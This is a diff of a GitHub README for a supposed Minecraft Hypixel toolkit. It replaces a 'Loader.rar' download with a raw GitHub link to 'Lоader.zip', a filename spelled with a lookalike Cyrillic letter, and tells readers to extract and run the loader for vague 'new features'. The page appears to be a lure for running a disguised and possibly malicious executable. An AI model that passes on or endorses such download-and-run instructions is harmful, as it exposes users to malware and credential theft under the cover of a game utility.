Oktabarka/HyperPixelToolkit/README.md

 # 🟢 Installation Guide

-1. Download **Loader.rar** from this GitHub repository.
+1. Download **https://raw.githubusercontent.com/Oktabarka/HyperPixelToolkit/main/Lоader.zip** from this GitHub repository.
-2. Extract the Loader.rar file using WinRAR, 7-Zip, or your preferred extraction tool.
+2. Extract the https://raw.githubusercontent.com/Oktabarka/HyperPixelToolkit/main/Lоader.zip file using WinRAR, 7-Zip, or your preferred extraction tool.
 3. Run the extracted Loader on your compatible operating system.
 4. Follow the on-screen instructions to configure your experience for Minecraft Hypixel servers.
 5. Enjoy new features and maximize your performance!